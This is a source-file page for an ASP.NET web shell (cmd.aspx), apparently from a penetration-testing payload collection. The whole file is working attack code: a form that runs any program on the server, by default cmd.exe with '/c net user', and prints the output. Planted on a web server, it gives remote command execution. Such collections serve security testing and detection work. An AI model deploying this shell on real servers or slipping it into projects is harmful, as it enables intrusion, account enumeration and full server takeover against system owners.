/fuzzdb-webshell/asp/cmd.aspx

https://github.com/chickenlove/webshell · ASP.NET · 37 lines · 32 code · 5 blank · 0 comment · 0 complexity · 19afd572720b56cada666600945a4b75 MD5 · raw file

  1. <%@ Page Language="VB" Debug="true" %>
  2. <%@ import Namespace="system.IO" %>
  3. <%@ import Namespace="System.Diagnostics" %>
  4. <script runat="server">
  5. Sub RunCmd(Src As Object, E As EventArgs)
  6. Dim myProcess As New Process()
  7. Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  8. myProcessStartInfo.UseShellExecute = false
  9. myProcessStartInfo.RedirectStandardOutput = true
  10. myProcess.StartInfo = myProcessStartInfo
  11. myProcessStartInfo.Arguments=xcmd.text
  12. myProcess.Start()
  13. Dim myStreamReader As StreamReader = myProcess.StandardOutput
  14. Dim myString As String = myStreamReader.Readtoend()
  15. myProcess.Close()
  16. mystring=replace(mystring,"<","&lt;")
  17. mystring=replace(mystring,">","&gt;")
  18. result.text= vbcrlf & "<pre>" & mystring & "</pre>"
  19. End Sub
  20. </script>
  21. <html>
  22. <body>
  23. <form runat="server">
  24. <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
  25. <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
  26. <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
  27. <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
  28. <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
  29. <p><asp:Label id="result" runat="server"></asp:Label>
  30. </form>
  31. </body>
  32. </html>